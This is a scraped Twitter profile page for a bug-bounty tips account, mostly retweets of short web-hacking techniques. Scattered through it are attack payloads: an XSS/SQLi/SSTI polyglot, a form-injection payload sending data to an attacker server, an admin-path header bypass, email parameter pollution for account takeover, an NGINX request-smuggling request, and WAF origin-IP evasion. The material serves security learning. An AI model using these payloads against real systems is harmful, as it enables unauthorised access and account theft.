Your Next Bug Tip

@YourNextBug

{ Everyone is sharing something and I am sharing all of them } Retweeting Tips & Write ups / Bug Bounty Tips

Vrijeme pridruživanja: studeni 2019.

Tweetovi

Blokirali ste korisnika/cu @YourNextBug

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @YourNextBug

  1. Prikvačeni tweet
    20. sij

    Google dork site: target this will help you find S3 buckets Razer S3 Bucket Hacked by $$ 500 $$ Write Up

    Poništi
  2. proslijedio/la je Tweet

    Subdomain bruteforce with ffuf on 443 port. It works fine ffuf -u -w jhaddixall.txt -v | grep "| URL | " | awk '{print $4}'

    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet
    prije 6 sati

    Takeover story of repo 1.A site having github logo 2. Example: Click on logo it'll show you git repo() 3. In my case , It was 404 Main part 4. Created git account with name of company , So it was like Successful takeover

    Poništi
  4. proslijedio/la je Tweet
    Odgovor korisniku/ci

    Used X-Original-URL: /ADMIN

    Poništi
  5. proslijedio/la je Tweet

    RCE story Forbidden 2.HTTP header in request - Login page access 3. Sqli queries tried no success 4. Some recon on gitlab - Found base64 pwd - decrypt 5. Accessed admin panel 6. Admin panel customized - CLI available 7. File read successful

    Poništi
  6. 2. velj

    BLH - Broken Link Hijacking Just suppose Ur site uses cool.c/Script.js After few year cool.c decided to close it services. Now story begins 😈 buys cool.c and then host Script.js BOoOM This happened to Linkedin READ BELOW

    Poništi
  7. proslijedio/la je Tweet
    2. velj

    sir I am facing a small confusion on HTTP Request Smuggling. Please help me with this you were explaining that all normal HTTP clients, including web browsers, do follow redirects. The two stolen requests I showed above came from such clients

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    31. sij

    I went COSMIC on the second week of 2020: Found a weirdly deep subdomain on and looked at it. => Then found a JS file with different hardcoded endpoints => tried those endpoints => found another subdomain => asked for creds used admin:admin [1/n]

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    21. sij

    If anyone wants tons of Resources for & or wants to Collab with others for , and play can join my server here You can share your ideas and project and we can work together

    Poništi
  10. proslijedio/la je Tweet
    23. velj 2019.

    To test XSS + SQLi + SSTI/CSTI with the same payload use : '"><svg/onload=prompt(5);>{{7*7}} ' ==> for Sql injection "><svg/onload=prompt(5);> ==> for XSS {{7*7}} ==> for SSTI/CSTI by me !

    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    31. sij

    Happy Friday hackers! Nitesh found a critical RCE vulnerability in Jenkins that led us to discover a Bitcoin mining service running on a DoD website 😲. Head over to the disclosed report to see all the details! Thanks for being 🔥 Nitesh

    Poništi
  12. 1. velj

    Haha, as excepted no one is sharing, Ok then Share the worst external bug bounty program, atleast it will save other's time. 😉

    Poništi
  13. proslijedio/la je Tweet
    1. velj

    Inject XSSHunter's payload in PortSwigger's hackability and send it to your target server to check for server side js execution. It will help you get screenshots in case if there is a blind SSRF :)

    Prikaži ovu nit
    Poništi
  14. 31. sij

    Any good external bug bounty program?

    Poništi
  15. 31. sij

    Steps 0) Login in with Twitter 1) Host Header Injection [to a.cxx] 2) Generate OAuth Token's Link 3) Send link to Victim, after victim authorize 4) Verifier send to a.cxx 5) Reuse use token Account Takeover by

    Poništi
  16. proslijedio/la je Tweet
    31. sij
    Odgovor korisnicima i sljedećem broju korisnika:

    This report is also an example i.e sending an array of the email addresses

    Poništi
  17. proslijedio/la je Tweet
    31. sij
    Odgovor korisnicima i sljedećem broju korisnika:

    Got adviced by a friend email=victim@email.com&email=attacker@email.com email=victim@email.com,attacker@email.com email[0]=victim@email.com&email[1]=attacker@email.com

    Poništi
  18. proslijedio/la je Tweet
    31. pro 2019.

    NGINX error_page request smuggling Example Vulnerable Request GET /a HTTP/1.1 Host: localhost Content-Length: 56 GET /_hidden/index.html HTTP/1.1 Host: notlocalhost. Vulnerable Versions: 1.8.1 1.8.1 1.9.5 1.14.1 1.14.2 1.15.9 1.16.1 1.17.6

    Poništi
  19. proslijedio/la je Tweet
    11. pro 2019.

    Login Page Authentication bypass: Any file name / authorize account/connect/authorize home/authorize dashboard/authorize account/authorize/

    Poništi
  20. proslijedio/la je Tweet
    29. sij

    If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity.

    Prikaži ovu nit
    Poništi
  21. proslijedio/la je Tweet
    30. sij

    Scanning a Cloudlfare WAF protected website.. impossible ? 1) Find real server ip (censys) 2) Use burp proxy regex to modify Host to original server address :D

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·